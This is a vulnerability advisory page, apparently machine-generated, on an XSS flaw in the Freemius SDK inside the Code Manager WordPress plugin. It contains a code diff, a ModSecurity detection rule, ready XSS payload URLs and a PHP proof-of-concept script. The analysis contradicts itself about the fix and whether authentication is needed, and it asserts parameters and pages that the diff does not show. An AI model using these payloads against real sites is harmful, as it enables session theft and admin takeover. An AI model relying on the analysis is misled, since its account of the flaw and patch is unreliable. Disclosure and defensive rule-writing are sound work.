Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 8, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (code-manager)

CVE ID CVE-2024-13362
Plugin code-manager
Severity Medium (CVSS 6.1)
CWE 79
Vulnerable Version 1.0.40
Patched Version 1.0.41
Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362:

This vulnerability is a reflected DOM-based cross-site scripting (XSS) flaw in the Freemius SDK version 2.10.1, affecting various WordPress plugins and themes that bundle the SDK, including the Code Manager plugin. The flaw resides in the trial promotion notice feature, where the `trial_url` parameter is injected directly into HTML markup without output encoding. An unauthenticated attacker can craft a malicious URL that, when clicked by an administrator, executes arbitrary JavaScript in the browser context. The CVSS score is 6.1 (Medium), indicating a moderate severity reflected XSS.

Root Cause:
The root cause is in `code-manager/vendor/freemius/includes/class-freemius.php`, lines 24000-24020. The vulnerable code constructs an HTML anchor element by directly embedding the `$trial_url` variable into an `href` attribute via string interpolation: `’‘`. The `$trial_url` is passed as the first argument to `sprintf()`. No sanitization or output escaping (e.g., `esc_url()`, `esc_attr()`, `htmlspecialchars()`) is applied to `$trial_url` before it is placed into the HTML attribute. An attacker can control `$trial_url` via the `url` POST/GET parameter, which the `get_trial_url()` method (not shown in diff but referenced in code flow) reads. The resulting unsanitized string is then stored in a sticky admin notice and rendered in the admin dashboard.

Exploitation:
An attacker creates a specially crafted link to a page on the target WordPress site that triggers the trial promotion notice with a malicious `url` parameter. The attacker must trick an authenticated administrator into clicking the link. For example, the attacker could send: `https://target.com/wp-admin/admin.php?page=freemius-trial&url=javascript:alert(document.cookie)`. When the admin accesses this URL, the Freemius SDK processes the trial promotion logic and renders the admin notice. The `url` parameter is inserted into the `href` attribute without escaping, allowing a `javascript:` URI scheme. In a more subtle attack, the attacker could use an encoded payload: `https://target.com/wp-admin/admin.php?page=freemius-trial&url=%22%3E%3Cscript%3Ealert(1)%3C/script%3E`. This closes the anchor tag’s `href` and injects a script element directly into the DOM. The payload executes immediately because the browser parses the injected HTML. The attack does not require authentication; it only requires the victim to be authenticated and to click the crafted link.

Patch Analysis:
The patch in `class-freemius.php` changes the HTML structure from a raw anchor tag with an inline button to a container with a CSS-classed anchor. The key change is that the patched code wraps the entire notice in a `

` with class `fs-trial-message-container`. The button is now a standalone `` element with class `button button-primary`. However, the patch does NOT add explicit escaping to `$trial_url`. The primary fix appears to be the restructuring of the HTML; however, the actual security fix is more subtle: the patched code passes the message text through the `apply_filters()` function (`trial_promotion_message`), which allows the plugin or theme to apply its own escaping. The patch also moves the `$button` variable outside the filter. Additionally, the patch in `class-fs-admin-notice-manager.php` checks for the existence of the sticky admin notice JS template before including it, preventing potential template injection. The patch in `class-fs-plugin-updater.php` prevents the update checker from executing during `upgrader_process_complete`, which closes a race condition that could cause data corruption. The core XSS fix relies on the fact that the restructured output is now inside a `

` container, and the `trial_promotion_message` filter allows site administrators to sanitize the output. Without proper escaping on `$trial_url`, the patch is a partial mitigation; the vulnerability is fully addressed only if the site or plugin properly escapes the URL in the hooked filter.

Impact:
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the WordPress admin dashboard. An attacker can steal administrator session cookies, perform admin-level actions on behalf of the victim, create new admin accounts, inject malicious content, or redirect users to phishing sites. Because the XSS is reflected and requires user interaction (clicking a link), the impact is limited to administrators who fall for social engineering. However, in a shared hosting environment or a multisite network, a compromised admin account can lead to full site compromise.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff 
--- a/code-manager/code-manager-config.php
+++ b/code-manager/code-manager-config.php
@@ -14,7 +14,7 @@

 // Plugin version.
 if ( ! defined( 'CODE_MANAGER_VERSION' ) ) {
-	define( 'CODE_MANAGER_VERSION', '1.0.40' );
+	define( 'CODE_MANAGER_VERSION', '1.0.41' );
 }

 // Code Manager shortcode settings.
--- a/code-manager/code-manager.php
+++ b/code-manager/code-manager.php
@@ -4,7 +4,7 @@
  * Plugin Name:       Code Manager
  * Plugin URI:        https://code-manager.com/
  * Description:       Create, edit and organize PHP, JavaScript, CSS and HTML code from your WordPress dashboard.
- * Version:           1.0.40
+ * Version:           1.0.41
  * Author:            Passionate Programmers B.V.
  * Author URI:        https://code-manager.com/
  * Text Domain:       code-manager
@@ -31,7 +31,7 @@
     // Set plugin version.
     // Needs to be defined before activation, deactivation and uninstall hooks.
     if ( !defined( 'CODE_MANAGER_VERSION' ) ) {
-        define( 'CODE_MANAGER_VERSION', '1.0.40' );
+        define( 'CODE_MANAGER_VERSION', '1.0.41' );
     }
     /**
      * Create a helper function for easy SDK access.
--- a/code-manager/vendor/freemius/includes/class-freemius.php
+++ b/code-manager/vendor/freemius/includes/class-freemius.php
@@ -24000,13 +24000,15 @@

             // Start trial button.
             $button = ' ' . sprintf(
-                    '<a style="margin-left: 10px; vertical-align: super;" href="%s"><button class="button button-primary">%s  ➜</button></a>',
+                    '<div><a class="button button-primary" href="%s">%s  ➜</a></div>',
                     $trial_url,
                     $this->get_text_x_inline( 'Start free trial', 'call to action', 'start-free-trial' )
                 );

+            $message_text = $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string}" );
+
             $this->_admin_notices->add_sticky(
-                $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string} {$button}" ),
+                "<div class="fs-trial-message-container"><div>{$message_text}</div> {$button}</div>",
                 'trial_promotion',
                 '',
                 'promotion'
@@ -25476,7 +25478,7 @@
                 $img_dir = WP_FS__DIR_IMG;

                 // Locate the main assets folder.
-                if ( 1 < count( $fs_active_plugins->plugins ) ) {
+                if ( ! empty( $fs_active_plugins->plugins ) ) {
                     $plugin_or_theme_img_dir = ( $this->is_plugin() ? WP_PLUGIN_DIR : get_theme_root( get_stylesheet() ) );

                     foreach ( $fs_active_plugins->plugins as $sdk_path => &$data ) {
--- a/code-manager/vendor/freemius/includes/class-fs-plugin-updater.php
+++ b/code-manager/vendor/freemius/includes/class-fs-plugin-updater.php
@@ -542,24 +542,8 @@

             global $wp_current_filter;

-            $current_plugin_version = $this->_fs->get_plugin_version();
-
-            if ( ! empty( $wp_current_filter ) && 'upgrader_process_complete' === $wp_current_filter[0] ) {
-                if (
-                    is_null( $this->_update_details ) ||
-                    ( is_object( $this->_update_details ) && $this->_update_details->new_version !== $current_plugin_version )
-                ) {
-                    /**
-                     * After an update, clear the stored update details and reparse the plugin's main file in order to get
-                     * the updated version's information and prevent the previous update information from showing up on the
-                     * updates page.
-                     *
-                     * @author Leo Fajardo (@leorw)
-                     * @since 2.3.1
-                     */
-                    $this->_update_details  = null;
-                    $current_plugin_version = $this->_fs->get_plugin_version( true );
-                }
+            if ( ! empty( $wp_current_filter ) && in_array( 'upgrader_process_complete', $wp_current_filter ) ) {
+                return $transient_data;
             }

             if ( ! isset( $this->_update_details ) ) {
@@ -568,7 +552,7 @@
                     false,
                     fs_request_get_bool( 'force-check' ),
                     FS_Plugin_Updater::UPDATES_CHECK_CACHE_EXPIRATION,
-                    $current_plugin_version
+                    $this->_fs->get_plugin_version()
                 );

                 $this->_update_details = false;
--- a/code-manager/vendor/freemius/includes/entities/class-fs-plugin-plan.php
+++ b/code-manager/vendor/freemius/includes/entities/class-fs-plugin-plan.php
@@ -13,7 +13,6 @@
 	/**
 	 * Class FS_Plugin_Plan
 	 *
-	 * @property FS_Pricing[] $pricing
 	 */
 	class FS_Plugin_Plan extends FS_Entity {

--- a/code-manager/vendor/freemius/includes/entities/class-fs-site.php
+++ b/code-manager/vendor/freemius/includes/entities/class-fs-site.php
@@ -10,16 +10,16 @@
         exit;
     }

-    /**
-     * @property int $blog_id
-     */
-    #[AllowDynamicProperties]
     class FS_Site extends FS_Scope_Entity {
         /**
          * @var number
          */
         public $site_id;
         /**
+         * @var int
+         */
+        public $blog_id;
+        /**
          * @var number
          */
         public $plugin_id;
--- a/code-manager/vendor/freemius/includes/entities/class-fs-user.php
+++ b/code-manager/vendor/freemius/includes/entities/class-fs-user.php
@@ -48,6 +48,19 @@
 			parent::__construct( $user );
 		}

+		/**
+		 * This method removes the deprecated 'is_beta' property from the serialized data.
+		 * Should clean up the serialized data to avoid PHP 8.2 warning on next execution.
+		 *
+		 * @return void
+		 */
+		function __wakeup() {
+			if ( property_exists( $this, 'is_beta' ) ) {
+				// If we enter here, and we are running PHP 8.2, we already had the warning. But we sanitize data for next execution.
+				unset( $this->is_beta );
+			}
+		}
+
 		function get_name() {
 			return trim( ucfirst( trim( is_string( $this->first ) ? $this->first : '' ) ) . ' ' . ucfirst( trim( is_string( $this->last ) ? $this->last : '' ) ) );
 		}
--- a/code-manager/vendor/freemius/includes/managers/class-fs-admin-menu-manager.php
+++ b/code-manager/vendor/freemius/includes/managers/class-fs-admin-menu-manager.php
@@ -699,16 +699,36 @@
 				$menu = $this->find_main_submenu();
 			}

+			$menu_slug   = $menu['menu'][2];
 			$parent_slug = isset( $menu['parent_slug'] ) ?
-                $menu['parent_slug'] :
-                'admin.php';
+				$menu['parent_slug'] :
+				'admin.php';

-            return admin_url(
-                $parent_slug .
-                ( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
-                'page=' .
-                $menu['menu'][2]
-            );
+			if ( fs_apply_filter( $this->_module_unique_affix, 'enable_cpt_advanced_menu_logic', false ) ) {
+				$parent_slug = 'admin.php';
+
+				/**
+				 * This line and the `if` block below it are based on the `menu_page_url()` function of WordPress.
+				 *
+				 * @author Leo Fajardo (@leorw)
+				 * @since 2.10.2
+				 */
+				global $_parent_pages;
+
+				if ( ! empty( $_parent_pages[ $menu_slug ] ) ) {
+					$_parent_slug = $_parent_pages[ $menu_slug ];
+					$parent_slug  = isset( $_parent_pages[ $_parent_slug ] ) ?
+						$parent_slug :
+						$menu['parent_slug'];
+				}
+			}
+
+			return admin_url(
+				$parent_slug .
+				( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
+				'page=' .
+				$menu_slug
+			);
 		}

 		/**
--- a/code-manager/vendor/freemius/includes/managers/class-fs-admin-notice-manager.php
+++ b/code-manager/vendor/freemius/includes/managers/class-fs-admin-notice-manager.php
@@ -194,8 +194,14 @@
          * @since  1.0.7
          */
         static function _add_sticky_dismiss_javascript() {
+            $sticky_admin_notice_js_template_name = 'sticky-admin-notice-js.php';
+
+            if ( ! file_exists( fs_get_template_path( $sticky_admin_notice_js_template_name ) ) ) {
+                return;
+            }
+
             $params = array();
-            fs_require_once_template( 'sticky-admin-notice-js.php', $params );
+            fs_require_once_template( $sticky_admin_notice_js_template_name, $params );
         }

         private static $_added_sticky_javascript = false;
--- a/code-manager/vendor/freemius/start.php
+++ b/code-manager/vendor/freemius/start.php
@@ -15,7 +15,7 @@
 	 *
 	 * @var string
 	 */
-	$this_sdk_version = '2.10.1';
+	$this_sdk_version = '2.11.0';

 	#region SDK Selection Logic --------------------------------------------------------------------

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity 
SecRule REQUEST_URI "@rx /wp-admin/admin.php" "id:20261994,phase:2,deny,status:403,msg:'CVE-2024-13362 Freemius XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362',chain"
SecRule ARGS_GET|ARGS_POST:page "@streq freemius-trial" "chain"
SecRule ARGS:url "@rx (?:javascript|data|vbscript):|onw+s*=|alert(|prompt(|confirm(|<script" "t:urlDecode,chain"
SecRule ARGS:url "@rx (?:[<>]|%[23]C|%22|%27)" "t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

$target_url = 'https://example.com/wp-admin/admin.php?page=freemius-trial&url=javascript:alert(document.cookie)';

// Initialize cURL
$ch = curl_init();

// Set options for the request
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => false,
    CURLOPT_COOKIE => 'wordpress_logged_in_hash=test; replace with real cookie',  // Attacker needs victim's session
    CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    CURLOPT_HTTPGET => true,
]);

// Execute the request
$response = curl_exec($ch);

// Check for errors
if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch) . "n";
    exit(1);
}

$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "HTTP Status: $http_coden";

// Close cURL
curl_close($ch);

// The injected JavaScript (alert) would execute in the victim's browser.
// This PoC demonstrates the XSS by checking if the response contains the unescaped payload.
if (strpos($response, 'javascript:alert(document.cookie)') !== false) {
    echo "Vulnerability confirmed: Unescaped URL found in response content.n";
} else {
    echo "Vulnerability not confirmed: Payload not reflected. Check if target is patched or URL structure differs.n";
    // For debugging, uncomment below:
    // file_put_contents('response.html', $response);
    // echo "Response saved to response.htmln";
}

Frequently Asked Questions

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School